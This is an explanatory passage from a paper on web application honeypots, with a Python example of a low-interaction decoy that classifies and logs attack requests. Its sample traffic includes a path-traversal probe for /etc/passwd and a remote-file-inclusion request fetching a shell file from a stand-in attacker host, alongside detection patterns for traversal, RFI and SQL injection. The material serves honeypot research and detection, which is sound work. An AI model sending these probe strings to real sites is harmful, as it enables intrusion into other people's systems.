Web application technologies like PHP, CGI, JavaScript, and Ajax have made it much easier to build and deploy services on the Internet. Unfortunately, this has also opened a wide avenue for new attacks, since it is as easy to introduce a vulnerability into a web application unintentionally as it is to add functionality intentionally. Consequently, web applications have increasingly become the focus of attackers.

Honeypots are popular and effective tools for studying new attack patterns. A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource [16]. Honeypots are electronic decoys that pretend to be normal systems but are really waiting to be attacked and compromised, so that the attackers can be tracked. Honeypots are equipped with special monitoring software that makes it easier to study successful attacks in detail. Honeynets, networks of honeypots, have proven to be very effective tools for learning more about Internet crime such as credit card fraud [11] or botnets [4], and as sensors in intrusion detection systems.

The simplest form of a honeypot is a real vulnerable system that has been modified to include surveillance methods. Such a system is called a high-interaction honeypot because the attacker is able to interact fully with the honeypot, just as with a real system. This offers the best potential for analyzing all aspects of an attack, but it also introduces the risk that the attacker will use the capabilities of the system to attack others. A high-interaction honeypot must disguise itself as a real machine, hiding its surveillance methods from all users, even those with root privileges. This is usually done using risky and resource-intensive techniques like full system emulators [24] or rootkit-type software, as in the GenIII honeynet [1]. To monitor automated attacks, for example those performed by autonomously spreading malware, such effort is not always required. So-called low-interaction honeypots offer only limited services to the attacker, for example by emulating only those parts of a service which are vulnerable. Low-interaction honeypots can typically be deployed with fewer resources because they do not fully implement the expected services, and they also incur less risk. However, it is more likely that the attacker will cut the attack short before useful information can be learned, either because the system does not support functionality needed for the attack or because the attacker suspects the system is a honeypot. A popular example of this kind of honeypot is honeyd [17], which is very easy to deploy (at least in comparison to a high-interaction honeypot).
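To make the low-interaction trade-off concrete, here is an added example (written for this page; it is not code from the paper or its toolkit) of a minimal low-interaction web honeypot: it parses raw HTTP requests, emulates only one "vulnerable" PHP-style endpoint, tags each request with the attack pattern it resembles, and emits a JSON log line. The endpoint name `/index.php`, the `page` parameter, the signature patterns and the sample requests are all constructed for illustration. The point to notice is in `emulate()`: a traversal probe gets a convincing decoy answer, but a remote-file-inclusion probe only gets a PHP-style warning, because the emulator cannot execute the included file the way a real vulnerable host would. That is exactly where an attacker may give up or recognize the honeypot.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample traffic (not captured data): one benign request, one
# directory-traversal probe, one remote-file-inclusion probe.
SAMPLE_REQUESTS = [
    b"GET /index.php?page=home HTTP/1.1\r\nHost: decoy.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n\r\n",
    b"GET /index.php?page=../../../../etc/passwd HTTP/1.1\r\nHost: decoy.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n\r\n",
    b"GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1\r\nHost: decoy.example\r\n"
    b"User-Agent: libwww-perl/5.8\r\n\r\n",
]

# Hypothetical signatures; a real deployment would use a maintained rule set.
SIGNATURES = {
    "traversal": re.compile(r"(\.\./|\.\.\\|%2e%2e)", re.I),
    "rfi": re.compile(r"^(https?|ftp)://", re.I),
    "sqli": re.compile(r"(['\"].*\b(or|and)\b\s+\d+=\d+|union\s+select)", re.I),
}

# Decoy content returned for a successful-looking traversal (fabricated).
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, query params, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"method": method, "path": parts.path, "params": params,
            "headers": headers, "body": body.decode("latin-1")}


def classify(req: dict) -> list:
    """Tag the request with every signature that matches a parameter or the body."""
    tags = set()
    for value in list(req["params"].values()) + [req["body"]]:
        for tag, pattern in SIGNATURES.items():
            if pattern.search(value):
                tags.add(tag)
    # Automated RFI/LFI scanners frequently announce a scripting library
    # rather than a browser; record that as a weak indicator.
    if not req["headers"].get("user-agent", "").lower().startswith("mozilla"):
        tags.add("scripted-client")
    return sorted(tags)


def emulate(req: dict) -> tuple:
    """Serve only the one endpoint the decoy pretends to have.

    Everything else is a 404: a low-interaction honeypot offers no more than
    the emulated, vulnerable part of the service, so any other functionality
    an attacker needs is simply absent.
    """
    if req["method"] != "GET" or req["path"] != "/index.php":
        return 404, "Not Found"
    page = req["params"].get("page", "home")
    if page == "home":
        return 200, "<html><body>Welcome</body></html>"
    if "traversal" in classify(req) and page.endswith("etc/passwd"):
        return 200, FAKE_PASSWD  # traversal is emulated convincingly
    # Anything else (including RFI) gets a PHP-style include warning. A real
    # vulnerable host would fetch and execute an RFI payload; the emulator
    # cannot, which is the limitation described above.
    return 200, ("<html><body>Warning: include(%s): failed to open stream: "
                 "No such file or directory</body></html>" % page)


def log_event(req: dict, tags: list) -> str:
    """One JSON line per request, the honeypot's surveillance record."""
    return json.dumps({"method": req["method"], "path": req["path"],
                       "params": req["params"],
                       "ua": req["headers"].get("user-agent", ""),
                       "tags": tags}, sort_keys=True)


def handle(raw: bytes) -> dict:
    """Full honeypot pipeline for one raw request: parse, classify, emulate, log."""
    req = parse_request(raw)
    tags = classify(req)
    status, body = emulate(req)
    return {"status": status, "body": body, "tags": tags, "log": log_event(req, tags)}


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        result = handle(raw)
        print(result["status"], result["tags"], result["log"])
```

Run it stand-alone and the three constructed requests produce a benign hit, a traversal hit that receives the decoy password file, and an RFI hit that receives only the warning. Wiring `handle()` behind a real socket listener is straightforward, but the limitation shown in `emulate()` is inherent to the approach, not to this particular code.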

A Generic Toolkit for Converting Web Applications Into High-Interaction Honeypots